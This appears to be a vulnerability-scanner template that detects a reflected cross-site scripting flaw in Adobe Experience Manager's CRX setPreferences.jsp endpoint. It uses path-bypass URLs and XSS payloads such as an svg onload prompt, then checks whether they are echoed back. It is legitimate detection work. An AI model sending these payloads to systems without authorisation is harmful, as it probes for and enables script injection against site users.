id: aem-crx-xss
info:
  name: AEM CRX XSS Generic 
  risk: Medium

params:
  - root: '{{.BaseURL}}'

requests:
  - method: GET
    redirect: false
    url: >-
     {{.root}}/crx/de/setPreferences.jsp;%0Aa.html?keymap=sample1>2d&language=0
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StringSearch("response", "JSONObject") && StringSearch("body", "sample1>2") && StringSearch("resHeaders", "text/html")

  - method: GET
    redirect: false
    url: >-
     {{.root}}/crx/de/setPreferences.jsp;%0Aa.html?keymap=r1><svg/onload=prompt(2)>d&language=0
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StringSearch("response", "JSONObject") && StringSearch("body", "<svg/onload=prompt") && StringSearch("resHeaders", "text/html")

  - method: GET
    redirect: false
    url: >-
     {{.root}}/content/..;/crx/de/setPreferences.jsp;html?keymap=r1<h1>sampled&language=en
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StringSearch("response", "JSONObject") && StringSearch("body", "<h1>sample") && StringSearch("resHeaders", "text/html")

